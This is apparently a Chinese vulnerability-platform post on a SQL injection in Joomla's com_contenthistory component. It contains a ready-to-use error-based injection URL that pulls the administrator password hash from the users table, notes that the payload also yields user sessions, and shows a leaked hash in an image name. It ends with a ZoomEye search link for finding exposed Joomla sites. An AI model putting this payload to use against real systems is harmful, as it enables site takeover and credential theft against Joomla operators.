漏洞详细说明与利用方法:https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
存在SQL注入的地方位于:/administrator /components /com_contenthistory/ models/history.php
![text](https://images.seebug.org/1445704150516)
测试payload为:
![text](https://images.seebug.org/1445704369318)
利用该payload即可获取用户session:
![text](https://images.seebug.org/1445704399315)
经过我的改进,可用如下payload直接获取管理员密码:
```
http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
```
其中%23\_即为joomla表前缀,无需获取表前缀,joomla会自动将\#\_转换为表前缀。
如下图:
![](https://images.seebug.org/contribute/52ebfb5d-6a09-43f7-83a2-e8d3f6daeb2a-Error__500_Duplicate_entry___2y_10_FQA31RVTwXx0Hy_gQH5yjed12crTXwDOkHR3idCTyb6bSH_wGLhg21__for_key__group_key__SQL_SELECT__select_1_from__select_count____concat__select__select_concat_password___from_nhlr7_users_limit_0_1__floor_rand_0__2__.png)
*ZoomEye dork*: http://www.zoomeye.org/search?q=app%3A%22joomla%22
全部评论 (26)